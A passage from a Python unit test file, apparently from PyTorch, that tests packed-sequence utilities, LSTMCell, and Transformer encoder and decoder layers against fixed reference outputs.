random.shuffle(unsorted_sequences)
unsorted_sequences_lengths = [t.size(0) for t in unsorted_sequences]
# compatibility with other utilities
for batch_first in (True, False):
for enforce_sorted in (True, False):
_compatibility_test(sequences, lengths, batch_first, enforce_sorted)
_compatibility_test(unsorted_sequences, unsorted_sequences_lengths,
batch_first)
def test_pack_padded_sequence(self):
def generate_test_case(sorted_lengths, should_shuffle):
def pad(tensor, length):
return torch.cat([tensor, tensor.new(length - tensor.size(0), *tensor.size()[1:]).zero_()])
max_length = sorted_lengths[0]
batch_sizes = [sum(map(bool, filter(lambda x: x >= i, sorted_lengths)))
for i in range(1, max_length + 1)]
offset = 0
padded = torch.cat([pad(i * 100 + torch.arange(1., 5 * l + 1).view(l, 1, 5), max_length)
for i, l in enumerate(sorted_lengths, 1)], 1)
expected_data = [[torch.arange(1., 6) + (i + 1) * 100 + 5 * n for i in range(batch_size)]
for n, batch_size in enumerate(batch_sizes)]
expected_data = list(itertools.chain.from_iterable(expected_data))
expected_data = torch.stack(expected_data, dim=0)
if should_shuffle:
# Shuffle the padded sequence to create an unsorted sequence
permutation = list(range(len(sorted_lengths)))
random.shuffle(permutation)
unsorted_indices = torch.tensor(permutation)
padded = padded.index_select(1, unsorted_indices)
lengths = torch.tensor(sorted_lengths).index_select(0, unsorted_indices)
else:
unsorted_indices = None
lengths = sorted_lengths
return padded.requires_grad_(), lengths, expected_data, batch_sizes, unsorted_indices
test_cases = [
# sorted_lengths, should_shuffle
[[10, 8, 4, 2, 2, 2, 1], False],
[[11, 10, 8, 6, 4, 3, 1], False],
[[11, 10, 8, 6, 4, 3, 1], True],
]
for test_case, batch_first in itertools.product(test_cases, (True, False)):
sorted_lengths, should_shuffle = test_case
padded, lengths, expected_data, batch_sizes, unsorted_indices = generate_test_case(
sorted_lengths, should_shuffle)
src = padded
if batch_first:
src = src.transpose(0, 1)
# check output
packed = rnn_utils.pack_padded_sequence(src, lengths, batch_first=batch_first,
enforce_sorted=not should_shuffle)
self.assertEqual(packed.data.data, expected_data)
self.assertEqual(packed.batch_sizes, batch_sizes)
self.assertEqual(packed.unsorted_indices, unsorted_indices)
# test inverse
unpacked, unpacked_len = rnn_utils.pad_packed_sequence(packed, batch_first=batch_first)
self.assertEqual(unpacked, src)
self.assertEqual(unpacked_len, lengths)
# check grad
if padded.grad is not None:
padded.grad.data.zero_()
grad_output = unpacked.data.clone().normal_()
unpacked.backward(grad_output)
if batch_first:
grad_output.transpose_(0, 1)
for i, l in enumerate(lengths):
self.assertEqual(padded.grad.data[:l, i], grad_output[:l, i])
if l < 10:
self.assertEqual(padded.grad.data[l:, i].abs().sum(), 0)
# test error messages
with self.assertRaisesRegex(RuntimeError, 'You can pass `enforce_sorted=False`'):
packed = rnn_utils.pack_padded_sequence(torch.randn(3, 3), [1, 3, 2])
with self.assertRaisesRegex(RuntimeError, 'empty tensor'):
packed = rnn_utils.pack_padded_sequence(torch.randn(0, 0), [])
def test_LSTM_cell(self):
# this is just a smoke test; these modules are implemented through
# autograd so no Jacobian test is needed
for bias in (True, False):
input = torch.randn(3, 10)
hx = torch.randn(3, 20)
cx = torch.randn(3, 20)
lstm = nn.LSTMCell(10, 20, bias=bias)
for _ in range(6):
hx, cx = lstm(input, (hx, cx))
(hx + cx).sum().backward()
def test_LSTM_cell_forward_input_size(self):
input = torch.randn(3, 11)
hx = torch.randn(3, 20)
cx = torch.randn(3, 20)
lstm = nn.LSTMCell(10, 20)
self.assertRaises(Exception, lambda: lstm(input, (hx, cx)))
def test_LSTM_cell_forward_hidden_size(self):
input = torch.randn(3, 10)
hx = torch.randn(3, 21)
cx = torch.randn(3, 20)
lstm = nn.LSTMCell(10, 20)
self.assertRaises(Exception, lambda: lstm(input, (hx, cx)))
self.assertRaises(Exception, lambda: lstm(input, (cx, hx)))
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
def test_pack_sequence_batch_sizes_throw(self):
with self.assertRaisesRegex(ValueError, r"batch_sizes should always be on CPU"):
m = nn.LSTM(3, 4, bidirectional=True, num_layers=2).to('cuda')
a = torch.rand(5, 3, device='cuda')
b = torch.tensor([1, 1, 1, 1, 1], device='cuda')
input = nn.utils.rnn.PackedSequence(a, b)
def test_Transformer_cell(self):
# this is just a smoke test; these modules are implemented through
# autograd so no Jacobian test is needed
d_model = 512
nhead = 16
num_encoder_layers = 4
num_decoder_layers = 3
dim_feedforward = 256
dropout = 0.3
bsz = 8
seq_length = 35
tgt_length = 15
for batch_first, src_size, tgt_size in zip((True, False),
[(bsz, seq_length, d_model),
(seq_length, bsz, d_model)],
[(bsz, tgt_length, d_model),
(tgt_length, bsz, d_model)]):
transformer = nn.Transformer(d_model, nhead, num_encoder_layers, num_decoder_layers,
dim_feedforward, dropout, batch_first=batch_first)
src = torch.randn(src_size)
src_mask = transformer.generate_square_subsequent_mask(seq_length).double()
tgt = torch.randn(tgt_size)
tgt_mask = transformer.generate_square_subsequent_mask(tgt_length).double()
memory_mask = torch.randn(tgt_length, seq_length).double()
src_key_padding_mask = torch.rand(bsz, seq_length) >= 0.5
tgt_key_padding_mask = torch.rand(bsz, tgt_length) >= 0.5
memory_key_padding_mask = torch.rand(bsz, seq_length) >= 0.5
output = transformer(src, tgt,
src_mask=src_mask,
tgt_mask=tgt_mask,
memory_mask=memory_mask,
src_key_padding_mask=src_key_padding_mask,
tgt_key_padding_mask=tgt_key_padding_mask,
memory_key_padding_mask=memory_key_padding_mask)
output.sum().backward()
def test_transformerencoderlayer(self):
# this is a deterministic test for TransformerEncoderLayer
d_model = 4
nhead = 2
dim_feedforward = 16
dropout = 0.0
bsz = 2
for batch_first in (False, True):
def perm_fn(x):
return x.transpose(1, 0) if batch_first else x
model = nn.TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout,
batch_first=batch_first)
# set constant weights of the model
for idx, p in enumerate(model.parameters()):
x = p.data
sz = x.view(-1).size(0)
shape = x.shape
x = torch.cos(torch.arange(0, sz).float().view(shape))
p.data.copy_(x)
# deterministic input
encoder_input = torch.tensor([[[20., 30., 40., 50.]]])
result = model(encoder_input)
ref_output = torch.tensor([[[2.258703, 0.127985, -0.697881, 0.170862]]])
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# 0 values are NOT masked. This shouldn't mask anything.
mask = torch.tensor([[0]]) == 1
result = model(encoder_input, src_key_padding_mask=mask)
result = result.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# 1 values are masked. Since there is only 1 input embedding this
# will result in nan.
mask = torch.tensor([[1]]) == 1
result = model(encoder_input, src_key_padding_mask=mask)
result = result.detach().numpy()
self.assertTrue(np.isnan(result).all())
# deterministic input
encoder_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]],
[[5., 6., 7., 8.]]]))
result = model(encoder_input)
ref_output = perm_fn(torch.tensor([[[2.272644, 0.119035, -0.691669, 0.153486]],
[[2.272644, 0.119035, -0.691669, 0.153486]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# all 0 which is no masking
mask = torch.tensor([[0, 0]]) == 1
result = model(encoder_input, src_key_padding_mask=mask)
result = result.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
mask = torch.tensor([[1, 0]]) == 1
result = model(encoder_input, src_key_padding_mask=mask)
ref_output = perm_fn(torch.tensor([[[2.301516, 0.092249, -0.679101, 0.103088]],
[[2.301516, 0.092249, -0.679101, 0.103088]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# deterministic input
encoder_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]))
result = model(encoder_input)
ref_output = perm_fn(torch.tensor([[[2.428589, 0.020835, -0.602055, -0.085249],
[2.427987, 0.021213, -0.602496, -0.084103]],
[[2.424689, 0.019155, -0.604793, -0.085672],
[2.413863, 0.022211, -0.612486, -0.072490]],
[[2.433774, 0.021598, -0.598343, -0.087548],
[2.425104, 0.019748, -0.604515, -0.084839]],
[[2.436185, 0.022682, -0.596625, -0.087261],
[2.433556, 0.021891, -0.598509, -0.086832]],
[[2.416246, 0.017512, -0.610712, -0.082961],
[2.422901, 0.024187, -0.606178, -0.074929]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# all 0
mask = torch.zeros([2, 5]) == 1
result = model(encoder_input, src_key_padding_mask=mask)
result = result.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
mask[0, 1] = 1
mask[1, 3] = 1
mask[1, 4] = 1
result = model(encoder_input, src_key_padding_mask=mask)
ref_output = perm_fn(torch.tensor([[[2.429026, 0.020793, -0.601741, -0.085642],
[2.428811, 0.021445, -0.601912, -0.084252]],
[[2.425009, 0.019155, -0.604566, -0.085899],
[2.415408, 0.02249 , -0.611415, -0.073]],
[[2.434199, 0.021682, -0.598039, -0.087699],
[2.42598, 0.019941, -0.603896, -0.085091]],
[[2.436457, 0.022736, -0.59643 , -0.08736],
[2.434021, 0.022093, -0.598179, -0.08679]],
[[2.416531, 0.017498, -0.610513, -0.083181],
[2.4242, 0.024653, -0.605266, -0.074959]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
def test_transformerencoderlayer_gelu(self):
# this is a deterministic test for TransformerEncoderLayer with gelu activation
d_model = 4
nhead = 2
dim_feedforward = 16
dropout = 0.0
bsz = 2
for activation, batch_first in product(('gelu', F.gelu, nn.GELU()), (True, False)):
def perm_fn(x):
return x.transpose(1, 0) if batch_first else x
model = nn.TransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout,
activation, batch_first=batch_first)
# set constant weights of the model
for idx, p in enumerate(model.parameters()):
x = p.data
sz = x.view(-1).size(0)
shape = x.shape
x = torch.cos(torch.arange(0, sz).float().view(shape))
p.data.copy_(x)
# deterministic input
encoder_input = torch.tensor([[[20., 30., 40., 50.]]])
result = model(encoder_input)
ref_output = torch.tensor([[[2.249815, 0.131006, -0.702199, 0.177868]]])
torch.testing.assert_close(result, ref_output, rtol=1e-5, atol=0)
# deterministic input
encoder_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]],
[[5., 6., 7., 8.]]]))
result = model(encoder_input)
ref_output = perm_fn(torch.tensor([[[2.264103, 0.121417, -0.696012, 0.159724]],
[[2.264103, 0.121417, -0.696012, 0.159724]]]))
torch.testing.assert_close(result, ref_output, rtol=1e-5, atol=0)
# deterministic input
encoder_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]))
result = model(encoder_input)
ref_output = perm_fn(torch.tensor([[[2.42163188, 0.03227153, -0.60714219, -0.05908082],
[2.42151276, 0.03302179, -0.60722523, -0.05762651]],
[[2.41926761, 0.02974034, -0.60879519, -0.0621269],
[2.41626395, 0.03539356, -0.61087842, -0.04978623]],
[[2.42382808, 0.03218872, -0.6055963, -0.06073591],
[2.41983477, 0.03085259, -0.60840145, -0.06046414]],
[[2.42500749, 0.03328855, -0.60476388, -0.0595334],
[2.4237977, 0.03290575, -0.60561789, -0.05940082]],
[[2.41383916, 0.02686345, -0.61256377, -0.06380707],
[2.42000277, 0.03800944, -0.60824798, -0.04754947]]]))
torch.testing.assert_close(result, ref_output, rtol=1e-5, atol=0)
def test_transformerdecoderlayer(self):
# this is a deterministic test for TransformerDecoderLayer
d_model = 4
nhead = 2
dim_feedforward = 16
dropout = 0.0
bsz = 2
seq_length = 5
tgt_length = 3
for batch_first in (False, True):
def perm_fn(x):
return x.transpose(1, 0) if batch_first else x
model = nn.TransformerDecoderLayer(d_model, nhead, dim_feedforward, dropout,
batch_first=batch_first)
# set constant weights of the model
for idx, p in enumerate(model.parameters()):
x = p.data
sz = x.view(-1).size(0)
shape = x.shape
x = torch.cos(torch.arange(0, sz).float().view(shape))
p.data.copy_(x)
# deterministic input
decoder_input = torch.tensor([[[20., 30., 40., 50.]]])
memory_input = torch.tensor([[[60., 70., 80., 90.]]])
result = model(decoder_input, memory_input)
ref_output = torch.tensor([[[2.314351, 0.094805, -0.671322, 0.101977]]])
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[9., 10., 11., 12.]],
[[11., 12., 13., 14.]]]))
memory_input = torch.tensor([[[1., 2., 3., 4.]]])
result = model(decoder_input, memory_input)
result = result.detach().numpy()
ref_output = perm_fn(torch.tensor([[[2.422245, 0.051716, -0.606338, -0.024756]],
[[2.422245, 0.051716, -0.606338, -0.024756]]]))
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]],
[[5., 6., 7., 8.]]]))
memory_input = perm_fn(torch.tensor([[[9., 10., 11., 12.]],
[[11., 12., 13., 14.]]]))
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.343536, 0.085561, -0.654954, 0.074991]],
[[2.343536, 0.085561, -0.654954, 0.074991]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[0.4517, 0.6793, 0.5313, 0.0034],
[0.2678, 0.3677, 0.4459, 0.7166]],
[[0.8100, 0.3716, 0.4096, 0.1976],
[0.6958, 0.8844, 0.6081, 0.8315]],
[[0.0494, 0.9343, 0.5955, 0.3830],
[0.5404, 0.3464, 0.9378, 0.6200]]]))
memory_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]))
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.430065, 0.027862, -0.601136, -0.073096],
[2.431935, 0.028907, -0.599809, -0.072488]],
[[2.428457, 0.027053, -0.602275, -0.073462],
[2.431970, 0.029387, -0.599789, -0.071621]],
[[2.431934, 0.028196, -0.599802, -0.073809],
[2.432306, 0.028858, -0.599542, -0.072846]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# key_padding_mask
key_padding_mask = torch.zeros(2, 3) == 1
result = model(decoder_input, memory_input, tgt_key_padding_mask=key_padding_mask)
ref_output = perm_fn(torch.tensor([[[2.430065, 0.027862, -0.601136, -0.073096],
[2.431935, 0.028907, -0.599809, -0.072488]],
[[2.428457, 0.027053, -0.602275, -0.073462],
[2.431970, 0.029387, -0.599789, -0.071621]],
[[2.431934, 0.028196, -0.599802, -0.073809],
[2.432306, 0.028858, -0.599542, -0.072846]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# key_padding_mask
key_padding_mask[0, 2] = 1
key_padding_mask[1, 1] = 1
key_padding_mask[1, 2] = 1
result = model(decoder_input, memory_input, tgt_key_padding_mask=key_padding_mask)
ref_output = perm_fn(torch.tensor([[[2.430025, 0.027643, -0.601164, -0.073476],
[2.4323, 0.029375, -0.599553, -0.071881]],
[[2.428523, 0.026838, -0.602226, -0.07391],
[2.432634, 0.029842, -0.599318, -0.071253]],
[[2.432278, 0.028152, -0.599555, -0.074139],
[2.432659, 0.029244, -0.599294, -0.072382]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# memory_key_padding_mask
key_padding_mask = torch.zeros(2, 5) == 1
result = model(decoder_input, memory_input, memory_key_padding_mask=key_padding_mask)
ref_output = perm_fn(torch.tensor([[[2.430065, 0.027862, -0.601136, -0.073096],
[2.431935, 0.028907, -0.599809, -0.072488]],
[[2.428457, 0.027053, -0.602275, -0.073462],
[2.431970, 0.029387, -0.599789, -0.071621]],
[[2.431934, 0.028196, -0.599802, -0.073809],
[2.432306, 0.028858, -0.599542, -0.072846]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
# memory_key_padding_mask
key_padding_mask[0, 4] = 1
key_padding_mask[1, 3] = 1
key_padding_mask[1, 4] = 1
result = model(decoder_input, memory_input, memory_key_padding_mask=key_padding_mask)
ref_output = perm_fn(torch.tensor([[[2.429757, 0.027358, -0.601351, -0.073816],
[2.432692, 0.028583, -0.599263, -0.073634]],
[[2.428247, 0.02662, -0.602419, -0.074123],
[2.432657, 0.029055, -0.599293, -0.072732]],
[[2.431515, 0.027687, -0.600096, -0.074459],
[2.433075, 0.028543, -0.598987, -0.073985]]]))
result = result.detach().numpy()
ref_output = ref_output.detach().numpy()
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
np.testing.assert_allclose(result, ref_output, atol=1e-5)
def test_transformerdecoderlayer_gelu(self):
# this is a deterministic test for TransformerDecoderLayer with gelu activation
d_model = 4
nhead = 2
dim_feedforward = 16
dropout = 0.0
bsz = 2
seq_length = 5
tgt_length = 3
for activation, batch_first in product(('gelu', F.gelu, nn.GELU()), (True, False)):
def perm_fn(x):
return x.transpose(1, 0) if batch_first else x
model = nn.TransformerDecoderLayer(d_model, nhead, dim_feedforward, dropout,
activation, batch_first=batch_first)
# set constant weights of the model
for idx, p in enumerate(model.parameters()):
x = p.data
sz = x.view(-1).size(0)
shape = x.shape
x = torch.cos(torch.arange(0, sz).float().view(shape))
p.data.copy_(x)
# deterministic input
decoder_input = torch.tensor([[[20., 30., 40., 50.]]])
memory_input = torch.tensor([[[60., 70., 80., 90.]]])
result = model(decoder_input, memory_input)
ref_output = torch.tensor([[[2.306435, 0.095946, -0.675796, 0.10687]]])
torch.testing.assert_close(result, ref_output, rtol=1e-5, atol=0)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[9., 10., 11., 12.]],
[[11., 12., 13., 14.]]]))
memory_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]]]))
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.415448, 0.054389, -0.610932, -0.0156613]],
[[2.415448, 0.054389, -0.610932, -0.0156613]]]))
torch.testing.assert_close(result, ref_output, rtol=1e-5, atol=0)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[1., 2., 3., 4.]],
[[5., 6., 7., 8.]]]))
memory_input = perm_fn(torch.tensor([[[9., 10., 11., 12.]],
[[11., 12., 13., 14.]]]))
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.338531, 0.087709, -0.65776, 0.080646]],
[[2.338531, 0.087709, -0.65776, 0.080646]]]))
torch.testing.assert_close(result, ref_output, rtol=1e-5, atol=0)
# deterministic input
decoder_input = perm_fn(torch.tensor([[[0.4517, 0.6793, 0.5313, 0.0034],
[0.2678, 0.3677, 0.4459, 0.7166]],
[[0.8100, 0.3716, 0.4096, 0.1976],
[0.6958, 0.8844, 0.6081, 0.8315]],
[[0.0494, 0.9343, 0.5955, 0.3830],
[0.5404, 0.3464, 0.9378, 0.6200]]]))
memory_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]))
result = model(decoder_input, memory_input)
ref_output = perm_fn(torch.tensor([[[2.42049104, 0.03443088, -0.60793706, -0.05436271],
[2.42210631, 0.03546578, -0.60679895, -0.05357488]],
[[2.41907674, 0.0336104, -0.60892977, -0.05490462],
[2.42216881, 0.03586554, -0.6067524, -0.05289126]],
[[2.42205716, 0.03488046, -0.60683681, -0.05460596],
[2.42240309, 0.0354595, -0.60659063, -0.05378816]]]))
torch.testing.assert_close(result, ref_output, rtol=1e-5, atol=0)
def test_transformerencoder(self):
def get_a_test_layer(use_cuda, activation, batch_first=False):
d_model = 4
nhead = 2
dim_feedforward = 16
dropout = 0.0
device = torch.device("cuda" if use_cuda else "cpu")
layer = nn.TransformerEncoderLayer(
d_model,
nhead,
dim_feedforward=dim_feedforward,
dropout=dropout,
activation=activation,
batch_first=batch_first).to(device)
with torch.no_grad():
# set constant weights of the model
for idx, p in enumerate(layer.parameters()):
x = p.data
sz = x.view(-1).size(0)
shape = x.shape
x = torch.cos(torch.arange(0, sz).float().view(shape))
p.data.copy_(x)
return layer
# this is a deterministic test for TransformerEncoder
activation = F.relu
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
for batch_first in (True, False):
def perm_fn(x):
return x.transpose(1, 0) if batch_first else x
encoder_layer = get_a_test_layer(use_cuda=use_cuda, activation=activation,
batch_first=batch_first)
model = nn.TransformerEncoder(encoder_layer, 1).to(device)
# deterministic input
encoder_input = perm_fn(torch.tensor([[[0.7462, 0.6653, 0.5679, 0.4891],
[0.5387, 0.1655, 0.3565, 0.0471]],
[[0.8335, 0.2799, 0.5031, 0.2947],
[0.1402, 0.0318, 0.7636, 0.1346]],
[[0.6333, 0.9344, 0.1376, 0.9938],
[0.8924, 0.2872, 0.6692, 0.2944]],
[[0.9897, 0.6915, 0.3154, 0.1733],
[0.8645, 0.3513, 0.3064, 0.0767]],
[[0.8117, 0.2366, 0.4838, 0.7881],
[0.3718, 0.4945, 0.9511, 0.0864]]]
)).to(device)
result = model(encoder_input)
ref_output = perm_fn(torch.tensor([[[2.428589, 0.020835, -0.602055, -0.085249],
[2.427987, 0.021213, -0.602496, -0.084103]],
[[2.424689, 0.019155, -0.604793, -0.085672],
[2.413863, 0.022211, -0.612486, -0.072490]],
[[2.433774, 0.021598, -0.598343, -0.087548],
[2.425104, 0.019748, -0.604515, -0.084839]],
[[2.436185, 0.022682, -0.596625, -0.087261],
[2.433556, 0.021891, -0.598509, -0.086832]],
[[2.416246, 0.017512, -0.610712, -0.082961],
[2.422901, 0.024187, -0.606178, -0.074929]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# all 0
mask = torch.zeros([2, 5]).to(device) == 1
result = model(encoder_input, src_key_padding_mask=mask)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
mask[0, 1] = 1
mask[1, 3] = 1
mask[1, 4] = 1
result = model(encoder_input, src_key_padding_mask=mask)
ref_output = perm_fn(torch.tensor([[[2.429026, 0.020793, -0.601741, -0.085642],
[2.428811, 0.021445, -0.601912, -0.084252]],
[[2.425009, 0.019155, -0.604566, -0.085899],
[2.415408, 0.02249, -0.611415, -0.073]],
[[2.434199, 0.021682, -0.598039, -0.087699],
[2.42598, 0.019941, -0.603896, -0.085091]],
[[2.436457, 0.022736, -0.59643, -0.08736],
[2.434021, 0.022093, -0.598179, -0.08679]],
[[2.416531, 0.017498, -0.610513, -0.083181],
[2.4242, 0.024653, -0.605266, -0.074959]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# test case 2, multiple layers no norm
model = nn.TransformerEncoder(encoder_layer, 2).to(device)
result = model(encoder_input, src_key_padding_mask=mask)
ref_output = perm_fn(torch.tensor([[[2.419051, 0.017446, -0.608738, -0.085003],
[2.419102, 0.017452, -0.608703, -0.085026]],
[[2.419043, 0.017445, -0.608744, -0.084999],
[2.419052, 0.017446, -0.608738, -0.085004]],
[[2.419067, 0.017448, -0.608727, -0.085010],
[2.419098, 0.017452, -0.608706, -0.085024]],
[[2.419072, 0.017449, -0.608724, -0.085012],
[2.419119, 0.017455, -0.608691, -0.085034]],
[[2.419019, 0.017442, -0.608761, -0.084989],
[2.419075, 0.017449, -0.608722, -0.085014]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
model = nn.TransformerEncoder(encoder_layer, 6).to(device)
result = model(encoder_input, src_key_padding_mask=mask)
ref_output = perm_fn(torch.tensor([[[2.419101, 0.017453, -0.608703, -0.085025],
[2.419101, 0.017453, -0.608704, -0.085025]],
[[2.419101, 0.017453, -0.608703, -0.085025],
[2.419101, 0.017453, -0.608704, -0.085025]],
[[2.419101, 0.017453, -0.608703, -0.085025],
[2.419101, 0.017453, -0.608704, -0.085025]],
[[2.419101, 0.017453, -0.608703, -0.085025],
[2.419101, 0.017453, -0.608704, -0.085025]],
[[2.419101, 0.017453, -0.608703, -0.085025],
[2.419101, 0.017453, -0.608704, -0.085025]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
# test case 3, multiple layers with norm
# d_model = 4
norm = nn.LayerNorm(4)
model = nn.TransformerEncoder(encoder_layer, 2, norm=norm).to(device)
result = model(encoder_input, src_key_padding_mask=mask)
ref_output = perm_fn(torch.tensor([[[1.695949, -0.357635, -0.893077, -0.445238],
[1.695955, -0.357639, -0.893050, -0.445266]],
[[1.695948, -0.357634, -0.893082, -0.445233],
[1.695950, -0.357635, -0.893077, -0.445238]],
[[1.695951, -0.357636, -0.893069, -0.445246],
[1.695955, -0.357639, -0.893052, -0.445264]],
[[1.695952, -0.357636, -0.893066, -0.445249],
[1.695957, -0.357641, -0.893041, -0.445276]],
[[1.695946, -0.357632, -0.893095, -0.445220],
[1.695952, -0.357637, -0.893065, -0.445251]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
model = nn.TransformerEncoder(encoder_layer, 6, norm=norm).to(device)
result = model(encoder_input, src_key_padding_mask=mask)
ref_output = perm_fn(torch.tensor([[[1.695955, -0.357639, -0.893051, -0.445265],
[1.695955, -0.357639, -0.893051, -0.445265]],
[[1.695955, -0.357639, -0.893051, -0.445265],
[1.695955, -0.357639, -0.893051, -0.445265]],
[[1.695955, -0.357639, -0.893051, -0.445265],
[1.695955, -0.357639, -0.893051, -0.445265]],
[[1.695955, -0.357639, -0.893051, -0.445265],
[1.695955, -0.357639, -0.893051, -0.445265]],
[[1.695955, -0.357639, -0.893051, -0.445265],
[1.695955, -0.357639, -0.893051, -0.445265]]]
)).to(device)
self.assertEqual(tuple(result.shape), tuple(ref_output.shape))
torch.testing.assert_close(result, ref_output, rtol=1e-7, atol=1e-5)
def test_transformerdecoder(self):
def get_a_test_layer(use_cuda, activation, batch_first=False):
d_model = 4
nhead = 2
dim_feedforward = 16
dropout = 0.0
device = torch.device("cuda" if use_cuda else "cpu")
layer = nn.TransformerDecoderLayer(
d_model,
nhead,
dim_feedforward=dim_feedforward,
dropout=dropout,
activation=activation,
batch_first=batch_first).to(device)
with torch.no_grad():
# set constant weights of the model
for idx, p in enumerate(layer.parameters()):
x = p.data
sz = x.view(-1).size(0)
shape = x.shape
x = torch.cos(torch.arange(0, sz).float().view(shape))
p.data.copy_(x)
return layer
# this is a deterministic test for TransformerDecoder
for batch_first in (False, True):
def perm_fn(x):
